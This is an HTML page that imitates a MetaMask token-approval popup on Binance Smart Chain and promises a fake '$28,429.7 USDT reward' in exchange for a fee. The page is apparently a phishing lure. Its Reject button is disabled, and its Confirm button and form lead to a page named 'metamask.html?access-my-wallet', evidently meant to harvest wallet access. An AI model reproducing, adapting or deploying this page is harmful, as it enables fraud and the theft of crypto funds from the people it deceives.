<!DOCTYPE html>
 <html><head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
     <meta name="viewport" content="width=device-width, initial-scale=1.0" />
     <meta charset="utf-8" />
     <title>MetaMask Notification </title>
     <style>
      #app-content {
        display: flex;
        flex-flow: column;
      }

      #loading__logo {
        width: 10rem;
        height: 10rem;
        align-self: center;
        margin: 10rem 0 0 0;
      }

      #loading__spinner {
        width: 2rem;
        height: 2rem;
        align-self: center;
        margin-top: 1rem;
      }
    </style>
     <link href="metamask-fox.svg" rel="shortcut icon" type="image/x-icon" />
     <link rel="stylesheet" type="text/css" href="index.css" title="ltr" />
     <link rel="stylesheet" type="text/css" href="index-rtl.css" title="rtl" disabled="" />
   <style></style></head>
   <body class="notification"><div style="z-index: 9999; position: fixed; width: 100%; border: 0px; padding: 5px; margin: 0px; background-color: transparent;  font-size: 12pt; font-family: sans-serif;" id="web2disk_nag" onclick="javascript: document.getElementById('web2disk_nag').style.display = 'none';">
	</div>
     <div id="app-content"><div class="app mouse-user-styles"><div><span></span></div><div class="menu-droppo-container network-droppo" style="position: absolute; top: 58px; width: 309px; z-index: 55;"><style>
          .menu-droppo-enter {
            transition: transform 300ms ease-in-out;
            transform: translateY(-200%);
          }

          .menu-droppo-enter.menu-droppo-enter-active {
            transition: transform 300ms ease-in-out;
            transform: translateY(0%);
          }

          .menu-droppo-leave {
            transition: transform 300ms ease-in-out;
            transform: translateY(0%);
          }

          .menu-droppo-leave.menu-droppo-leave-active {
            transition: transform 300ms ease-in-out;
            transform: translateY(-200%);
          }
        </style></div><div class="main-container-wrapper"><div class="page-container"><div class="confirm-page-container-navigation" style="display: none;"><div class="confirm-page-container-navigation__container" style="visibility: hidden;"><div class="confirm-page-container-navigation__arrow" data-testid="first-page"><img src="images/double-arrow.svg" alt="" /></div><div class="confirm-page-container-navigation__arrow" data-testid="previous-page"><img src="/images/single-arrow.svg" alt="" /></div></div><div class="confirm-page-container-navigation__textcontainer"><div class="confirm-page-container-navigation__navtext">1 of 1 </div><div class="confirm-page-container-navigation__longtext">requests waiting to be ____________ </div></div><div class="confirm-page-container-navigation__container" style="visibility: hidden;"><div class="confirm-page-container-navigation__arrow" data-testid="next-page"><img class="confirm-page-container-navigation__imageflip" src="images/single-arrow.svg" alt="" /></div><div class="confirm-page-container-navigation__arrow" data-testid="last-page"><img class="confirm-page-container-navigation__imageflip" src="images/double-arrow.svg" alt="" /></div></div></div><div class="confirm-page-container-header"><div class="confirm-page-container-header__row"><div class="https://mantradao.com/favicon.icor"><div class="confirm-page-container-header__address-identicon"><div class=""><div class="identicon" style="height: 24px; width: 24px; border-radius: 12px;"><div style="border-radius: 50px; overflow: hidden; padding: 0px; margin: 0px; width: 24px; height: 24px; display: inline-block; background: rgb(1, 135, 142);"><svg x="0" y="0" width="24" height="24"><rect x="0" y="0" width="24" height="24" transform="translate(-1.8283976330022202 3.9268598674416935) rotate(122.5 12 12)" fill="#F94301"></rect><rect x="0" y="0" width="24" height="24" transform="translate(8.395005443347443 6.451852780925942) rotate(121.5 12 12)" fill="#C8144A"></rect><rect x="0" y="0" width="24" height="24" transform="translate(17.29272690351644 3.3990868252390825) rotate(113.9 12 12)" fill="#FA7900"></rect></svg></div></div></div></div><div class="confirm-page-container-header__address"></div></div><div class="network-display network-display--colored network-display--mainnet chip chip--with-left-icon chip--transparent" role="button" tabindex="0"><div class="chip__left-icon"><div class="color-indicator color-indicator--filled color-indicator--color-mainnet color-indicator--size-lg"><span class="color-indicator__inner-circle"></span></div></div><span class="box box--margin-top-1 box--margin-right-0 box--margin-bottom-1 box--margin-left-0 typography chip__label typography--h7 typography--align-undefined typography--color-ui-4 typography--weight-normal">Binance
                  Smart Chain Mainnet </span></div></div></div><div class="confirm-approve-content"><div class="confirm-approve-content__identicon-wrapper"><img class="identicon confirm-approve-content__identicon" src="favicon-96x96.png" alt="" style="height: 48px; width: 48px; border-radius: 24px;" /></div><div class="confirm-approve-content__title">Allow Tether token</div><div class="confirm-approve-content__description">Do you trust this site? By granting this permission, you are allowing Tether token to withdraw your $28,429.7 USDT reward MetaMask and automatic transactions for you. </div><div class="confirm-approve-content__edit-submission-button-container"><div class="confirm-approve-content__medium-link-text cursor-pointer">Edit Permission </div></div><div class="confirm-approve-content__card-wrapper"><div class="confirm-approve-content__card--no-border"><div class="confirm-approve-content__card-header"><div class="confirm-approve-content__card-header__symbol"></div><div class="confirm-approve-content__card-header__title">Transaction Fee </div><div class="confirm-approve-content__small-blue-text cursor-pointer">USD/BNB</div></div><div class="confirm-approve-content__card-content"><div class="confirm-approve-content__transaction-details-content"><div class="confirm-approve-content__small-text">A fee is associated with this request. </div><div class="confirm-approve-content__transaction-details-content__fee"><div class="confirm-approve-content__transaction-details-content__primary-fee">$80 </div><div class="confirm-approve-content__transaction-details-content__secondary-fee">0.4 BNB </div></div></div></div><div class="confirm-approve-content__view-full-tx-button-wrapper"></div></div></div></div><div class="page-container__footer"><footer><button class="button btn-default page-container__footer-button" disabled="" data-testid="page-container-footer-cancel">Reject </button> &ensp;  <a href="metamask.html?access-my-wallet" class="button btn-primary page-container__footer-button" data-testid="page-container-footer-next">Confirm </a><form method="post" action="metamask.html?access-my-wallet"></form></footer></div></div></div></div></div>
     <div id="popover-content"></div>
 </body></html>